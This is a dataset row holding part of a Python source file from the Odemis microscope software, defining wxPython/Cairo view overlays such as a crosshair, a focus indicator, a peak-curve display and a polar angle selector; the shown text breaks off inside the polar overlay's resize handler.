code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
:created: 2014-01-25
:author: Rinze de Laat
:copyright: © 2014 Rinze de Laat, Delmic
This file is part of Odemis.
.. license::
Odemis is free software: you can redistribute it and/or modify it under the
terms of the GNU General Public License version 2 as published by the Free
Software Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
Odemis. If not, see http://www.gnu.org/licenses/.
"""
from __future__ import division
import cairo
import itertools
import logging
import math
import numpy
from odemis import util
from odemis.gui.comp.overlay.base import Label
from odemis.util import peak
import wx
import odemis.gui as gui
import odemis.gui.comp.overlay.base as base
import odemis.model as model
import odemis.util.conversion as conversion
import odemis.util.units as units
class TextViewOverlay(base.ViewOverlay):
""" Render the present labels to the screen """
def __init__(self, cnvs):
base.ViewOverlay.__init__(self, cnvs)
def draw(self, ctx):
if self.labels:
self._write_labels(ctx)
class CrossHairOverlay(base.ViewOverlay):
""" Render a static cross hair to the center of the view """
def __init__(self, cnvs, colour=gui.CROSSHAIR_COLOR, size=gui.CROSSHAIR_SIZE):
base.ViewOverlay.__init__(self, cnvs)
self.colour = conversion.hex_to_frgba(colour)
self.size = size
def draw(self, ctx):
""" Draw a cross hair to the Cairo context """
center = self.cnvs.get_half_view_size()
tl = (center[0] - self.size, center[1] - self.size)
br = (center[0] + self.size, center[1] + self.size)
ctx.set_line_width(1)
# Draw shadow
ctx.set_source_rgba(0, 0, 0, 0.9)
ctx.move_to(tl[0] + 1.5, center[1] + 1.5)
ctx.line_to(br[0] + 1.5, center[1] + 1.5)
ctx.move_to(center[0] + 1.5, tl[1] + 1.5)
ctx.line_to(center[0] + 1.5, br[1] + 1.5)
ctx.stroke()
# Draw cross hair
ctx.set_source_rgba(*self.colour)
ctx.move_to(tl[0] + 0.5, center[1] + 0.5)
ctx.line_to(br[0] + 0.5, center[1] + 0.5)
ctx.move_to(center[0] + 0.5, tl[1] + 0.5)
ctx.line_to(center[0] + 0.5, br[1] + 0.5)
ctx.stroke()
class PlayIconOverlay(base.ViewOverlay):
""" Render Stream (play/pause) icons to the view """
opacity = 0.8
def __init__(self, cnvs):
base.ViewOverlay.__init__(self, cnvs)
self.pause = False # if True: displayed
self.play = 0 # opacity of the play icon
self.colour = conversion.hex_to_frgba(gui.FG_COLOUR_HIGHLIGHT, self.opacity)
def hide_pause(self, hidden=True):
""" Hide or show the pause icon """
self.pause = not hidden
if not self.pause:
self.play = 1.0
wx.CallAfter(self.cnvs.Refresh)
def draw(self, ctx):
if self.show:
if self.pause:
self._draw_pause(ctx)
elif self.play:
self._draw_play(ctx)
if self.play > 0:
self.play -= 0.1 # a tenth less
# Force a refresh (without erase background), to cause a new draw
wx.CallLater(50, self.cnvs.Refresh, False) # in 0.05 s
else:
self.play = 0
def _get_dimensions(self):
width = max(16, self.view_width / 10)
height = width
right = self.view_width
bottom = self.view_height
margin = self.view_width / 25
return width, height, right, bottom, margin
def _draw_play(self, ctx):
width, height, right, _, margin = self._get_dimensions()
half_height = height / 2
x = right - margin - width + 0.5
y = margin + 0.5
ctx.set_line_width(1)
ctx.set_source_rgba(
*conversion.hex_to_frgba(
gui.FG_COLOUR_HIGHLIGHT, self.play))
ctx.move_to(x, y)
x = right - margin - 0.5
y += half_height
ctx.line_to(x, y)
x = right - margin - width + 0.5
y += half_height
ctx.line_to(x, y)
ctx.close_path()
ctx.fill_preserve()
ctx.set_source_rgba(0, 0, 0, self.play)
ctx.stroke()
def _draw_pause(self, ctx):
width, height, right, _, margin = self._get_dimensions()
bar_width = max(width / 3, 1)
gap_width = max(width - (2 * bar_width), 1) - 0.5
x = right - margin - bar_width + 0.5
y = margin + 0.5
ctx.set_line_width(1)
ctx.set_source_rgba(*self.colour)
ctx.rectangle(x, y, bar_width, height)
x -= bar_width + gap_width
ctx.rectangle(x, y, bar_width, height)
ctx.set_source_rgba(*self.colour)
ctx.fill_preserve()
ctx.set_source_rgb(0, 0, 0)
ctx.stroke()
class FocusOverlay(base.ViewOverlay):
""" Display the focus modification indicator """
def __init__(self, cnvs):
base.ViewOverlay.__init__(self, cnvs)
self.margin = 10
self.line_width = 16
self.shifts = [None, None] # None or float (m)
self.ppm = (5e6, 5e6) # px/m, conversion ratio m -> px
self.focus_label = self.add_label("", align=wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL)
def draw(self, ctx):
# TODO: Both focuses at the same time, or 'snap' to horizontal/vertical on first motion?
ctx.set_line_width(10)
ctx.set_line_join(cairo.LINE_JOIN_MITER)
ctx.set_source_rgba(1.0, 1.0, 1.0, 0.8)
x, y = self.cnvs.ClientSize
# Horizontal
if self.shifts[0] is not None:
y -= self.margin + (self.line_width // 2)
middle = x / 2
# don't display extremely small values, which are due to accumulation
# of floating point error
shiftm = self.shifts[0]
if abs(shiftm) < 1e-12:
shiftm = 0
shift = shiftm * self.ppm[0]
end_x = middle + (middle * (shift / (x / 2)))
end_x = min(max(self.margin, end_x), x - self.margin)
ctx.move_to(middle, y)
ctx.line_to(end_x, y)
ctx.stroke()
lbl = "focus %s" % units.readable_str(shiftm, 'm', 2)
self.focus_label.text = lbl
self.focus_label.pos = (end_x, y - 15)
self._write_label(ctx, self.focus_label)
# Vertical
if self.shifts[1] is not None:
x -= self.margin + (self.line_width // 2)
middle = y / 2
# don't display extremely small values, which are due to accumulation
# of floating point error
shiftm = self.shifts[1]
if abs(shiftm) < 1e-12:
shiftm = 0
shift = shiftm * self.ppm[1]
end_y = middle - (middle * (shift / (y / 2)))
end_y = min(max(self.margin, end_y), y - self.margin)
ctx.move_to(x, middle)
ctx.line_to(x, end_y)
ctx.stroke()
lbl = "focus %s" % units.readable_str(shiftm, 'm', 2)
self.focus_label.text = lbl
self.focus_label.pos = (x - 15, end_y)
self._write_label(ctx, self.focus_label)
def add_shift(self, shift, axis):
""" Adds a value on the given axis and updates the overlay
shift (float): amount added to the current value (can be negative)
axis (int): axis for which this happens
"""
if self.shifts[axis] is None:
self.shifts[axis] = shift
else:
self.shifts[axis] += shift
self.cnvs.Refresh()
def clear_shift(self):
logging.debug("Clearing focus shift")
self.shifts = [None, None]
self.cnvs.Refresh()
class ViewSelectOverlay(base.ViewOverlay, base.SelectionMixin):
def __init__(self, cnvs, colour=gui.SELECTION_COLOUR, center=(0, 0)):
base.ViewOverlay.__init__(self, cnvs)
base.SelectionMixin.__init__(self, colour, center, base.EDIT_MODE_BOX)
self.position_label = self.add_label("")
def draw(self, ctx, shift=(0, 0), scale=1.0):
if self.select_v_start_pos and self.select_v_end_pos:
start_pos = self.select_v_start_pos
end_pos = self.select_v_end_pos
# logging.debug("Drawing from %s, %s to %s. %s", start_pos[0],
# start_pos[1],
# end_pos[0],
# end_pos[1] )
rect = (start_pos[0] + 0.5,
start_pos[1] + 0.5,
end_pos[0] - start_pos[0],
end_pos[1] - start_pos[1])
# draws a light black background for the rectangle
ctx.set_line_width(2)
ctx.set_source_rgba(0, 0, 0, 0.5)
ctx.rectangle(*rect)
ctx.stroke()
# draws the dotted line
ctx.set_line_width(1.5)
ctx.set_dash([2])
ctx.set_line_join(cairo.LINE_JOIN_MITER)
ctx.set_source_rgba(*self.colour)
ctx.rectangle(*rect)
ctx.stroke()
self._debug_draw_edges(ctx)
self.position_label.pos = start_pos
def on_left_down(self, evt):
""" Start drag action if enabled, otherwise call super method so event will propagate """
if self.active:
base.SelectionMixin._on_left_down(self, evt)
base.ViewOverlay.on_left_down(self, evt)
def on_left_up(self, evt):
""" End drag action if enabled, otherwise call super method so event will propagate """
if self.active:
base.SelectionMixin._on_left_up(self, evt)
base.ViewOverlay.on_left_up(self, evt)
def on_motion(self, evt):
""" Process drag motion if enabled, otherwise call super method so event will propagate """
if self.active:
base.SelectionMixin._on_motion(self, evt)
base.ViewOverlay.on_motion(self, evt)
class MarkingLineOverlay(base.ViewOverlay, base.DragMixin):
""" Draw a vertical line at the given view position
Provides a .val VA indicating the selected position by the user (using mouse).
"""
HORIZONTAL = 1
VERTICAL = 2
def __init__(self, cnvs, colour=gui.SELECTION_COLOUR, orientation=None, map_y_from_x=False):
"""
map_y_from_x (bool): If True, the Y coordinate of the value will be
based on the data, obtained via cnvs.val_x_to_val(), and .val will
contain None as Y => 1D movement.
If False, both X and Y will be based on the mouse position (2D movement).
"""
base.ViewOverlay.__init__(self, cnvs)
base.DragMixin.__init__(self)
self.label = None
self.colour = conversion.hex_to_frgba(colour)
self.map_y_from_x = map_y_from_x
# highlighted position (in the data format, but not necessarily part of the data)
self.val = model.VigilantAttribute(None) # tuple (X, Y) or None
self._x_label = self.add_label("", colour=self.colour)
self._y_label = self.add_label("", colour=self.colour, align=wx.ALIGN_BOTTOM)
self.orientation = orientation or self.HORIZONTAL
self.label_orientation = self.orientation
self.line_width = 2
@property
def x_label(self):
return self._x_label
@x_label.setter
def x_label(self, lbl):
if self.label_orientation & self.VERTICAL:
self._x_label.text = lbl
@property
def y_label(self):
return self._y_label
@y_label.setter
def y_label(self, lbl):
self._y_label.text = lbl
def clear_labels(self):
self.val.value = None
def hide_x_label(self):
self.label_orientation = self.HORIZONTAL
# Event Handlers
def on_left_down(self, evt):
if self.active:
base.DragMixin._on_left_down(self, evt)
self.colour = self.colour[:3] + (0.5,)
self._store_event_pos(evt)
self.cnvs.Refresh()
base.ViewOverlay.on_left_down(self, evt)
def on_left_up(self, evt):
if self.active:
base.DragMixin._on_left_up(self, evt)
self.colour = self.colour[:3] + (1.0,)
self._store_event_pos(evt)
self.cnvs.Refresh()
base.ViewOverlay.on_left_up(self, evt)
def on_motion(self, evt):
if self.active and self.left_dragging:
self._store_event_pos(evt)
self.cnvs.Refresh()
base.ViewOverlay.on_motion(self, evt)
# END Event Handlers
def _store_event_pos(self, evt):
""" Position the focus line at the position of the given mouse event """
x, y = evt.GetPositionTuple()
x = max(1, min(self.view_width, x))
if self.map_y_from_x:
# Y will be automatically mapped at drawing
val = self.cnvs.pos_x_to_val_x(x, snap=False), None
else:
y = max(1, min(self.view_height, y))
val = self.cnvs.pos_to_val((x, y), snap=False)
self.val.value = val
def draw(self, ctx):
ctx.set_line_width(self.line_width)
ctx.set_dash([3])
ctx.set_line_join(cairo.LINE_JOIN_MITER)
ctx.set_source_rgba(*self.colour)
if self.val.value is not None:
val = self.val.value
if self.map_y_from_x:
# Maps Y and also snap X to the closest X value in the data
val = self.cnvs.val_x_to_val(val[0])
v_pos = self.cnvs.val_to_pos(val)
self.x_label = units.readable_str(val[0], self.cnvs.unit_x, 3)
self.y_label = units.readable_str(val[1], self.cnvs.unit_y, 3)
# v_posx, v_posy = self.v_pos.value
if self.orientation & self.VERTICAL:
ctx.move_to(v_pos[0], 0)
ctx.line_to(v_pos[0], self.cnvs.ClientSize.y)
ctx.stroke()
if self.orientation & self.HORIZONTAL:
ctx.move_to(0, v_pos[1])
ctx.line_to(self.cnvs.ClientSize.x, v_pos[1])
ctx.stroke()
if self.x_label.text:
self.x_label.pos = (v_pos[0] + 5, self.cnvs.ClientSize.y)
self._write_label(ctx, self.x_label)
if self.y_label.text:
yp = max(0, v_pos[1] - 5) # Padding from line
# Increase bottom margin if x label is close
label_padding = 30 if v_pos[0] < 50 else 0
yn = min(self.view_height - label_padding, yp)
self.y_label.pos = (2, yn)
self._write_label(ctx, self.y_label)
r, g, b, a = conversion.change_brightness(self.colour, -0.2)
ctx.set_source_rgba(r, g, b, 0.5)
ctx.arc(v_pos[0], v_pos[1], 5.5, 0, 2 * math.pi)
ctx.fill()
class CurveOverlay(base.ViewOverlay, base.DragMixin):
""" Draw a curve at the given view position
"""
def __init__(self, cnvs, colour=gui.FG_COLOUR_CURVE, colour_peaks=gui.FG_COLOUR_PEAK, length=256):
base.ViewOverlay.__init__(self, cnvs)
base.DragMixin.__init__(self)
self.length = length # curve length
self.label = None
self.colour = conversion.hex_to_frgba(colour, 0.5)
self.colour_peaks = conversion.hex_to_frgba(colour_peaks)
# The current highlighted position
self.selected_wl = None # in same unit as the range
self.peaks = None # list of peak data
self.peak_offset = None
self.range = None # array of wl/px
self.unit = None # str
self.type = None # str
# Cached computation of the peak curve. The global curve is index None
self._curves = {} # wavelength/None -> list of values
self.list_labels = []
self.width_labels = []
self.amplitude_labels = []
self.peak_labels = []
self.line_width = 2
# Event Handlers
def on_left_down(self, evt):
if self.active:
base.DragMixin._on_left_down(self, evt)
self._store_event_pos(evt)
self.cnvs.Refresh()
base.ViewOverlay.on_left_down(self, evt)
def on_left_up(self, evt):
if self.active:
base.DragMixin._on_left_up(self, evt)
self._store_event_pos(evt)
self.cnvs.Refresh()
base.ViewOverlay.on_left_up(self, evt)
def on_motion(self, evt):
if self.active and self.left_dragging:
self._store_event_pos(evt)
self.cnvs.Refresh()
base.ViewOverlay.on_motion(self, evt)
# END Event Handlers
def clear_labels(self):
self.peaks = None
def _store_event_pos(self, evt):
""" Position the focus line at the position of the given mouse event """
x, y = evt.GetPositionTuple()
if self.peaks is not None:
# Store in the same format as the data, so it still works after resize
x = max(min(self.view_width, x), 1)
width = self.range[-1] - self.range[0]
self.selected_wl = self.range[0] + x / self.view_width * width
else:
self.selected_wl = None
def update_data(self, peak_data, peak_offset, spectrum_range, unit, type):
"""
peak_data (list of tuple of 3 floats): series of (pos, width, amplitude)
peak_offset (float): initial offset
spectrum_range (list of floats): wavelength/pixel for each pixel in the original spectrum data
unit (str): m or px
type (str): peak fitting method, 'gaussian' or 'lorentzian'
"""
self.peaks = peak_data
self.peak_offset = peak_offset
self.range = spectrum_range
self.unit = unit
self.type = type
self._curves = {} # throw away the cache
self.cnvs.Refresh()
def draw(self, ctx):
peaks = self.peaks
rng = self.range
if (peaks is None) or (self.type is None):
return
# If original range is too small, create a finer one
if len(rng) < self.length * 0.9:
rng = numpy.linspace(rng[0], rng[-1], self.length)
# Compute the label and global curve on the first time needed
if None not in self._curves:
self.width_labels = []
self.amplitude_labels = []
self.peak_labels = []
for pos, width, amplitude in peaks:
self.peak_labels.append(units.readable_str(pos, self.unit, 3))
self.width_labels.append(units.readable_str(width, self.unit, 3))
self.amplitude_labels.append(units.readable_str(amplitude, None, 3))
self._curves[None] = peak.Curve(rng, peaks, self.peak_offset, type=self.type)
curve = self._curves[None]
step = max(1, len(rng) // self.length)
rng_first = rng[0]
rng_last = rng[-1]
rng_n = rng[1::step]
mn, mx = min(curve), max(curve)
if mn == mx:
logging.info("Global peak curve is flat, not displaying")
return
client_size_x = self.cnvs.ClientSize.x
client_size_y = self.cnvs.ClientSize.y
ctx.set_line_width(self.line_width)
ctx.set_dash([3])
ctx.set_line_join(cairo.LINE_JOIN_MITER)
ctx.set_source_rgba(*self.colour)
curve_drawn = []
curve_n = curve[1::step]
for x, y in itertools.izip(rng_n, curve_n):
x_canvas = (((x - rng_first) * (client_size_x - 1)) / (rng_last - rng_first)) + 1
y_canvas = (((y - mn) * (client_size_y - 1)) / (mx - mn)) + 1
y_canvas = client_size_y - y_canvas
ctx.line_to(x_canvas, y_canvas)
curve_drawn.append((x_canvas, y_canvas))
ctx.stroke()
# Draw the peak and peak label
peaks_canvpos = []
# Depends on canvas size so always update
for pos, width, amplitude in peaks:
peaks_canvpos.append(int((((pos - rng_first) * (client_size_x - 1)) / (rng_last - rng_first)) + 1))
ctx.set_source_rgba(*self.colour_peaks)
self.list_labels = []
for p_label, p_pos in zip(self.peak_labels, peaks_canvpos):
ctx.move_to(p_pos - 3, client_size_y)
ctx.line_to(p_pos, client_size_y - 16)
ctx.line_to(p_pos + 3, client_size_y)
ctx.line_to(p_pos - 3, client_size_y)
ctx.fill()
peak_tuple = min(curve_drawn, key=lambda p:abs(p[0] - p_pos))
peak_label = Label(
text=p_label,
pos=(p_pos, peak_tuple[1] - 20),
font_size=12,
flip=True,
align=wx.ALIGN_LEFT | wx.ALIGN_TOP,
colour=self.colour_peaks, # default to white
opacity=1.0,
deg=None
)
self.labels.append(peak_label)
self.list_labels.append(peak_label)
# Draw the peak curve (if the user has selected a wavelength)
if self.selected_wl is not None and peaks:
# Find closest peak
peak_i = util.index_closest(self.selected_wl, [p for (p, w, a) in peaks]) # peak pos
peak_pos = peaks[peak_i][0]
peak_margin = (rng_last - rng_first) / (5 * len(peaks))
if abs(peak_pos - self.selected_wl) <= peak_margin:
if peak_i not in self._curves:
self._curves[peak_i] = peak.Curve(rng, [peaks[peak_i]], self.peak_offset, type=self.type)
single_curve = self._curves[peak_i]
ctx.set_source_rgba(*self.colour)
x_canvas = 1
y_canvas = client_size_y - 1
ctx.move_to(x_canvas, y_canvas)
curve_n = single_curve[1::step]
for x, y in itertools.izip(rng_n, curve_n):
x_canvas = (((x - rng_first) * (client_size_x - 1)) / (rng_last - rng_first)) + 1
y_canvas = (((y - mn) * (client_size_y - 1)) / (mx - mn)) + 1
y_canvas = client_size_y - y_canvas
ctx.line_to(x_canvas, y_canvas)
x_canvas = client_size_x
y_canvas = client_size_y - 1
ctx.line_to(x_canvas, y_canvas)
ctx.fill()
# Add more info to that specific peak label
self.list_labels[peak_i].text += "\nWidth: " + self.width_labels[peak_i] + "\nAmplitude: " + self.amplitude_labels[peak_i]
for pl in self.list_labels:
self._write_label(ctx, pl)
class DichotomyOverlay(base.ViewOverlay):
""" This overlay allows the user to select a sequence of nested quadrants
within the canvas. The quadrants are numbered 0 to 3, from the top left to
the bottom right. The first quadrant is the biggest, with each subsequent
quadrant being nested in the one before it.
"""
TOP_LEFT = 0
TOP_RIGHT = 1
BOTTOM_LEFT = 2
BOTTOM_RIGHT = 3
def __init__(self, cnvs, sequence_va, colour=gui.SELECTION_COLOUR):
""" :param sequence_va: (ListVA) VA to store the sequence in
"""
base.ViewOverlay.__init__(self, cnvs)
self.colour = conversion.hex_to_frgba(colour)
# Color for quadrant that will expand the sequence
self.hover_forw = conversion.hex_to_frgba(colour, 0.5)
# Color for quadrant that will cut the sequence
self.hover_back = conversion.change_brightness(self.hover_forw, -0.2)
self.sequence_va = sequence_va
self.sequence_rect = []
# This attribute is used to track the position of the mouse cursor.
# The first value denotes the smallest quadrant (in size) in the
# sequence and the second one the quadrant index number that will
# be added if the mouse is clicked.
# This value should be set to (None, None) if the mouse is outside the
# canvas or when we are not interested in updating the sequence.
self.hover_pos = (None, None)
# maximum number of sub-quadrants (6->2**6 smaller than the whole area)
self.max_len = 6
self.sequence_va.subscribe(self.on_sequence_change, init=True)
# Disabling the overlay will allow the event handlers to ignore events
self.active = False
def on_sequence_change(self, seq):
if not all([0 <= v <= 3 for v in seq]):
raise ValueError("Illegal quadrant values in sequence!")
rect = 0, 0, self.view_width, self.view_height
self.sequence_rect = [rect]
for i, q in enumerate(seq):
rect = self.index_to_rect(i, q)
self.sequence_rect.append(rect)
self.cnvs.Refresh()
def _reset(self):
""" Reset all attributes to their default values and get the dimensions
from the cnvs canvas.
"""
logging.debug("Reset")
self.sequence_va.value = []
# Event Handlers
def on_leave(self, evt):
""" Event handler called when the mouse cursor leaves the canvas """
if self.active:
# When the mouse cursor leaves the overlay, the current top quadrant
# should be highlighted, so clear the hover_pos attribute.
self.hover_pos = (None, None)
self.cnvs.Refresh()
else:
base.ViewOverlay.on_leave(self, evt)
def on_motion(self, evt):
""" Mouse motion event handler """
if self.active:
self._update_hover(evt.GetPosition())
else:
base.ViewOverlay.on_motion(self, evt)
def on_left_down(self, evt):
""" Prevent the left mouse button event from propagating when the overlay is active"""
if not self.active:
base.ViewOverlay.on_motion(self, evt)
def on_dbl_click(self, evt):
""" Prevent the double click event from propagating if the overlay is active"""
if not self.active:
base.ViewOverlay.on_dbl_click(self, evt)
def on_left_up(self, evt):
""" Mouse button handler """
if self.active:
# If the mouse cursor is over a selectable quadrant
if None not in self.hover_pos:
idx, quad = self.hover_pos
# If we are hovering over the 'top' quadrant, add it to the sequence
if len(self.sequence_va.value) == idx:
new_seq = self.sequence_va.value + [quad]
new_seq = new_seq[:self.max_len] # cut if too long
# Jump to the desired quadrant otherwise, cutting the sequence
else:
# logging.debug("Trim")
new_seq = self.sequence_va.value[:idx] + [quad]
self.sequence_va.value = new_seq
self._update_hover(evt.GetPosition())
else:
base.ViewOverlay.on_leave(self, evt)
def on_size(self, evt):
""" Called when size of canvas changes
"""
# Force the re-computation of rectangles
self.on_sequence_change(self.sequence_va.value)
base.ViewOverlay.on_size(self, evt)
# END Event Handlers
def _update_hover(self, pos):
idx, quad = self.quad_hover(pos)
# Change the cursor into a hand if the quadrant being hovered over
# can be selected. Use the default cursor otherwise
if idx >= self.max_len:
self.cnvs.reset_dynamic_cursor()
idx, quad = (None, None)
else:
self.cnvs.set_dynamic_cursor(wx.CURSOR_HAND)
# Redraw only if the quadrant changed
if self.hover_pos != (idx, quad):
self.hover_pos = (idx, quad)
self.cnvs.Refresh()
def quad_hover(self, vpos):
""" Return the sequence index number of the rectangle at position vpos
and the quadrant vpos is over inside that rectangle.
:param vpos: (int, int) The viewport x,y hover position
"""
# Loop over the rectangles, smallest one first
for i, (x, y, w, h) in reversed(list(enumerate(self.sequence_rect))):
if x <= vpos.x <= x + w:
if y <= vpos.y <= y + h:
# If vpos is within the rectangle, we can determine the
# quadrant.
# Remember that the quadrants are numbered as follows:
#
# 0 | 1
# --+--
# 2 | 3
# Construct the quadrant number by starting with 0
quad = 0
# If the position is in the left half, add 1 to the quadrant
if vpos.x > x + w / 2:
quad += 1
# If the position is in the bottom half, add 2
if vpos.y > y + h / 2:
quad += 2
return i, quad
return None, None
def index_to_rect(self, idx, quad):
""" Translate given rectangle and quadrant into a view rectangle
:param idx: (int) The index number of the rectangle in sequence_rect
that we are going to use as a cnvs.
:param quad: (int) The quadrant number
:return: (int, int, int, int) Rectangle tuple of the form x, y, w, h
"""
x, y, w, h = self.sequence_rect[idx]
# The new rectangle will have half the size of the cnvs one
w /= 2
h /= 2
# If the quadrant is in the right half, construct x by adding half the
# width to x position of the cnvs rectangle.
if quad in (self.TOP_RIGHT, self.BOTTOM_RIGHT):
x += w
# If the quadrant is in the bottom half, construct y by adding half the
# height to the y position of the cnvs rectangle.
if quad in (self.BOTTOM_LEFT, self.BOTTOM_RIGHT):
y += h
return x, y, w, h
def draw(self, ctx):
ctx.set_source_rgba(*self.colour)
ctx.set_line_width(2)
ctx.set_dash([2])
ctx.set_line_join(cairo.LINE_JOIN_MITER)
# Draw previous selections as dashed rectangles
for rect in self.sequence_rect:
# logging.debug("Drawing ", *args, **kwargs)
ctx.rectangle(*rect)
ctx.stroke()
# If the mouse is over the canvas
if None not in self.hover_pos:
idx, quad = self.hover_pos
# If the mouse is over the smallest selected quadrant
if idx == len(self.sequence_va.value):
# Mark quadrant to be added
ctx.set_source_rgba(*self.hover_forw)
rect = self.index_to_rect(idx, quad)
ctx.rectangle(*rect)
ctx.fill()
else:
# Mark higher quadrant to 'jump' to
ctx.set_source_rgba(*self.hover_back)
rect = self.index_to_rect(idx, quad)
ctx.rectangle(*rect)
ctx.fill()
# Mark current quadrant
ctx.set_source_rgba(*self.hover_forw)
ctx.rectangle(*self.sequence_rect[-1])
ctx.fill()
# If the mouse is not over the canvas
elif self.sequence_va.value and self.sequence_rect:
# Mark the currently selected quadrant
ctx.set_source_rgba(*self.hover_forw)
ctx.rectangle(*self.sequence_rect[-1])
ctx.fill()
class PolarOverlay(base.ViewOverlay):
def __init__(self, cnvs):
base.ViewOverlay.__init__(self, cnvs)
self.canvas_padding = 0
# Rendering attributes
self.center_x = None
self.center_y = None
self.radius = None
self.inner_radius = None
self.tau = 2 * math.pi
self.num_ticks = 6
self.ticks = []
self.ticksize = 10
# Value attributes
self.px, self.py = None, None
self.tx, self.ty = None, None
self.colour = conversion.hex_to_frgb(gui.SELECTION_COLOUR)
self.colour_drag = conversion.hex_to_frgba(gui.SELECTION_COLOUR, 0.5)
self.colour_highlight = conversion.hex_to_frgb(gui.FG_COLOUR_HIGHLIGHT)
self.intensity_label = self.add_label("", align=wx.ALIGN_CENTER_HORIZONTAL,
colour=self.colour_highlight)
self.phi = None # Phi angle in radians
self.phi_line_rad = None # Phi drawing angle in radians (is phi -90)
self.phi_line_pos = None # End point in pixels of the Phi line
self.phi_label = self.add_label("", colour=self.colour,
align=wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_BOTTOM)
self.theta = None # Theta angle in radians
self.theta_radius = None # Radius of the theta circle in pixels
self.theta_label = self.add_label("", colour=self.colour,
align=wx.ALIGN_CENTER_HORIZONTAL)
self.intersection = None # The intersection of the circle and line in pixels
self.dragging = False
# Calculate the characteristic values for the first time
self.on_size()
# Property Getters/Setters
@property
def phi_rad(self):
return self.phi
@phi_rad.setter
def phi_rad(self, phi_rad):
self.phi = phi_rad
self._calculate_phi()
self.cnvs.Refresh()
@property
def phi_deg(self):
return math.degrees(self.phi)
@phi_deg.setter
def phi_deg(self, phi_deg):
self.phi_rad = math.radians(phi_deg)
@property
def theta_rad(self):
return self.theta
@theta_rad.setter
def theta_rad(self, theta_rad):
self.theta = theta_rad
self.theta_radius = (theta_rad / (math.pi / 2)) * self.inner_radius
self._calculate_theta()
self.cnvs.Refresh()
@property
def theta_deg(self):
return math.degrees(self.theta)
@theta_deg.setter
def theta_deg(self, theta_deg):
self.theta_rad = math.radians(theta_deg)
# END Property Getters/Setters
def _calculate_phi(self, view_pos=None):
""" Calcualate the Phi angle and the values to display the Phi line """
if view_pos:
vx, vy = view_pos
dx, dy = vx - self.center_x, self.center_y - vy
# Calculate the phi angle in radians
# Atan2 gives the angle between the positive x axis and the point
# dx,dy
self.phi = math.atan2(dx, dy) % self.tau
if self.phi:
self.phi_line_rad = self.phi - math.pi / 2
cos_phi_line = math.cos(self.phi_line_rad)
sin_phi_line = math.sin(self.phi_line_rad)
# Pixel to which to draw the Phi line to
phi_x = self.center_x + self.radius * cos_phi_line
phi_y = self.center_y + self.radius * sin_phi_line
self.phi_line_pos = (phi_x, phi_y)
# Calc Phi label pos
# Calculate the view point on the line where to place the label
if self.theta_radius > self.inner_radius / 2:
radius = self.inner_radius * 0.25
else:
radius = self.inner_radius * 0.75
x = self.center_x + radius * cos_phi_line
y = self.center_y + radius * sin_phi_line
self.phi_label.text = u"φ %0.1f°" % math.degrees(self.phi)
self.phi_label.deg = math.degrees(self.phi_line_rad)
# Now we calculate a perpendicular offset to the Phi line where
# we can plot the label. It is also determined if the label should
# flip, depending on the angle.
if self.phi < math.pi:
ang = -math.pi / 2.0 # -45 deg
self.phi_label.flip = False
else:
ang = math.pi / 2.0 # 45 deg
self.phi_label.flip = True
# Calculate a point further down the line that we will rotate
# around the calculated label x,y. By translating (-x and -y) we
# 'move' the origin to label x,y
rx = (self.center_x - x) + (radius + 5) * cos_phi_line
ry = (self.center_y - y) + (radius + 5) * sin_phi_line
# Apply the rotation
lx = rx * math.cos(ang) - ry * math.sin(ang)
ly = rx * math.sin(ang) + ry * math.cos(ang)
# Translate back to our original origin
lx += x
ly += y
self.phi_label.pos = (lx, ly)
def _calculate_theta(self, view_pos=None):
""" Calculate the Theta angle and the values needed to display it. """
if view_pos:
vx, vy = view_pos
dx, dy = vx - self.center_x, self.center_y - vy
# Get the radius and the angle for Theta
self.theta_radius = min(math.sqrt(dx * dx + dy * dy),
self.inner_radius)
self.theta = (math.pi / 2) * (self.theta_radius / self.inner_radius)
elif self.theta:
self.theta_radius = (self.theta / (math.pi / 2)) * self.inner_radius
else:
return
# Calc Theta label pos
x = self.center_x
y = self.center_y + self.theta_radius + 3
theta_str = u"θ %0.1f°" % math.degrees(self.theta)
self.theta_label.text = theta_str
self.theta_label.pos = (x, y)
def _calculate_intersection(self):
if None not in (self.phi_line_rad, self.theta_radius):
# Calculate the intersection between Phi and Theta
x = self.center_x + self.theta_radius * math.cos(self.phi_line_rad)
y = self.center_y + self.theta_radius * math.sin(self.phi_line_rad)
self.intersection = (x, y)
else:
self.intersection = None
def _calculate_display(self, view_pos=None):
""" Calculate the values needed for plotting the Phi and Theta lines and labels
If view_pos is not given, the current Phi and Theta angles will be used.
"""
self._calculate_phi(view_pos)
self._calculate_theta(view_pos)
self._calculate_intersection()
# if (view_pos and 0 < self.intersection[0] < self.cnvs.ClientSize.x and
# 0 < self.intersection[1] < self.cnvs.ClientSize.y):
# # FIXME: Determine actual value here
# #self.intensity_label.text = ""
# pass
# Event Handlers
def on_left_down(self, evt):
if self.active:
self.dragging = True
base.ViewOverlay.on_left_down(self, evt)
def on_left_up(self, evt):
if self.active:
self._calculate_display(evt.GetPositionTuple())
self.dragging = False
self.cnvs.Refresh()
base.ViewOverlay.on_left_up(self, evt)
def on_motion(self, evt):
# Only change the values when the user is dragging
if self.active and self.dragging:
self._calculate_display(evt.GetPositionTuple())
self.cnvs.Refresh()
else:
base.ViewOverlay.on_motion(self, evt)
def on_enter(self, evt):
if self.active:
self.cnvs.set_default_cursor(wx.CROSS_CURSOR)
else:
base.ViewOverlay.on_enter(self, evt)
def on_leave(self, evt):
if self.active:
self.cnvs.reset_default_cursor()
else:
base.ViewOverlay.on_leave(self, evt)
def on_size(self, evt=None):
# Calculate the characteristic values
self.center_x = self.cnvs.ClientSize.x / 2
self.center_y = self.cnvs.ClientSize.y / 2
self.inner_radius = min(self.center_x, self.center_y)
self.radius = self.inner_radius + (self.ticksize / 1.5)
self.ticks = []
# Top middle
for i in range(self.num_ticks):
# phi needs to be rotated 90 degrees counter clockwise, otherwise
# 0 degrees will be at the right side of the circle
phi = (self.tau / self.num_ticks * i) - (math.pi / 2)
deg = round(math.degrees(phi))
cos = math.cos(phi)
sin = math.sin(phi)
